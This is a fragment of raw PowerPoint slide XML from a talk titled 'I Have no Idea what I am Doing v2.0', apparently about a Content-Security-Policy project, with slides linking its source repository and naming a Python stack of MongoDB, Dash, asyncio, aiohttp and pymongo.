              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8EAED"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	'self'; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243652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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="17" presetClass="entr" presetSubtype="8"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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="17" presetClass="entr" presetSubtype="8"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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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6" grpId="0" animBg="1"/>
      <p:bldP spid="7"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og wearing sunglasses and a collar sitting at a desk&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C51AF5-6876-2DB9-BCF6-8B3D5A4EF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8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77C492B-6109-3FE1-A3A0-5DB4599CE578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="12560"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I Have no Idea what I am Doing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> v2.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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80710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09CE2A-21A9-305B-B7C3-A50814CD000E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797297" y="741391"/>
            <a:ext cx="6172199"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kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Project Source Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A7475A-0B0B-EDA7-C9FD-AE5FB05F16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114" y="1215576"/>
            <a:ext cx="4408730" cy="4318755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CC00BD-6633-1483-5737-888EEA7B6E1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5797297" y="2533475"/>
            <a:ext cx="6172199" cy="3448225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/sensepost/dresscode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 9">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9492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red button on a yellow and black striped surface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF7E26C-4EBF-5CF0-9CAE-628A2736EF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2213726" y="643466"/>
            <a:ext cx="7764548" cy="5571067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3895073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79B2CF1-E55A-38D3-C595-ACE02B8CDD45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="606409" y="1138235"/>
            <a:ext cx="3288323" cy="2655752"/>
            <a:chOff x="616120" y="852380"/>
            <a:chExt cx="3288323" cy="2655752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2062" name="Picture 14" descr="Mongodb Logo Png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCF0E4E-3CA9-1ABA-E91E-0964CCC17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20" y="852380"/>
              <a:ext cx="3288323" cy="9372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white object with orange dots&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EDB1529-A111-0E39-0FD4-282D5EED4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5436" y="2038442"/>
              <a:ext cx="1469690" cy="1469690"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8F2A73-293B-88E5-81E2-258413D6AE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="1"/>
            <a:endCxn id="16" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2985415" y="1499347"/>
            <a:ext cx="2595420" cy="155979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43" name="Group 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A49817B-BD12-D7B9-2290-EAA5A78A930C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5412960" y="4226650"/>
            <a:ext cx="6452822" cy="1928258"/>
            <a:chOff x="5412960" y="4226650"/>
            <a:chExt cx="6452822" cy="1928258"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2064" name="Picture 16" descr="Creating a multi-page Dash Application | by Prakhar Rathi | Level Up Coding">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07065641-F755-CA22-8F6D-3F7E147D72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587" b="31944"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7710703" y="4534560"/>
              <a:ext cx="4155079" cy="107414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computer screen with graphics on it&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA803CFB-058D-DFA3-8BE6-E8A448C113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2960" y="4226650"/>
              <a:ext cx="1928258" cy="1928258"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF305CE-1DD2-262C-1EE7-342A66240680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="30" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985415" y="3059142"/>
            <a:ext cx="2427545" cy="213163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41" name="Group 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A374B5FA-2E54-13DB-DDAD-593E9AEB64E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5580835" y="302729"/>
            <a:ext cx="4773349" cy="2335696"/>
            <a:chOff x="5580835" y="302729"/>
            <a:chExt cx="4773349" cy="2335696"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Picture 22" descr="A blue rectangular object with different colored squares&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160390D4-2C03-C70D-68D3-6FB6976AED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835" y="703092"/>
              <a:ext cx="1592509" cy="1592509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Group 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BBD758-E8D3-F0D0-3118-E6C4DA17CC1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7257228" y="302729"/>
              <a:ext cx="3096956" cy="2335696"/>
              <a:chOff x="7795236" y="1037184"/>
              <a:chExt cx="3820548" cy="2850116"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="Trapezium 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8F4273D-4186-6C7E-116B-F00236A078C8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7274676" y="1827594"/>
                <a:ext cx="2352942" cy="1311821"/>
              </a:xfrm>
              <a:prstGeom prst="trapezoid">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4" name="Group 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3647E8F7-5B38-EFAC-F319-0A425A007656}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8727747" y="1037184"/>
                <a:ext cx="2888037" cy="2850116"/>
                <a:chOff x="8977745" y="2636619"/>
                <a:chExt cx="2888037" cy="2850116"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="19" name="Group 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095D87A6-EE5F-9760-DAEB-E38CAD692B6D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="8977745" y="2636619"/>
                  <a:ext cx="2888037" cy="2850116"/>
                  <a:chOff x="5410793" y="2876408"/>
                  <a:chExt cx="3112655" cy="3243294"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="17" name="Scroll: Vertical 16">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68979D2E-4638-B964-A6DB-1A963C9B2E6D}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="5410793" y="2876408"/>
                    <a:ext cx="3112655" cy="3243294"/>
                  </a:xfrm>
                  <a:prstGeom prst="verticalScroll">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:srgbClr val="347AB4"/>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1400"/>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="18" name="Group 17">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82A064CA-BB32-F471-CF12-0EF27C5F3CD8}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="6208869" y="4036572"/>
                    <a:ext cx="1816420" cy="1519383"/>
                    <a:chOff x="9035769" y="3367813"/>
                    <a:chExt cx="1816420" cy="1519383"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="10" name="TextBox 9">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF4C2C4F-DAE1-E6F5-0C1F-325D1CF456B2}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr txBox="1"/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="9035769" y="3367813"/>
                      <a:ext cx="1816420" cy="555584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </p:spPr>
                  <p:txBody>
                    <a:bodyPr wrap="square" rtlCol="0">
                      <a:spAutoFit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>asyncio</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Helvetica"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CD80D4D6-8048-BA0F-307C-6CB0368BDDBF}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr txBox="1"/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="9035769" y="4331612"/>
                      <a:ext cx="1816420" cy="555584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </p:spPr>
                  <p:txBody>
                    <a:bodyPr wrap="square" rtlCol="0">
                      <a:spAutoFit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>pymongo</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">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BA90D184-498E-77DD-91AC-19246EC2FB9D}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr txBox="1"/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="9035769" y="3876064"/>
                      <a:ext cx="1816420" cy="555584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </p:spPr>
                  <p:txBody>
                    <a:bodyPr wrap="square" rtlCol="0">
                      <a:spAutoFit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                          <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>aiohttp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </p:txBody>
                </p:sp>
              </p:grpSp>
            </p:grpSp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="2050" name="Picture 2" descr="Python icon - Free download on Iconfinder">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA715E91-D533-F666-3DF4-E62650A7C4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6327" y="3049454"/>
                  <a:ext cx="786799" cy="786799"/>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4" name="Graphic 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D1F11D0-6542-D074-BF55-405A552E0B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4823" y="2187483"/>
            <a:ext cx="1227003" cy="495895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6584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orful pyramid of sales&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABCB773-0315-8460-6BBD-19D4014B5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09" y="1111720"/>
            <a:ext cx="4764916" cy="4764916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08088210-E49E-F6BA-4C06-2592CA9C869D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705843" y="1114674"/>
            <a:ext cx="5825755" cy="892552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
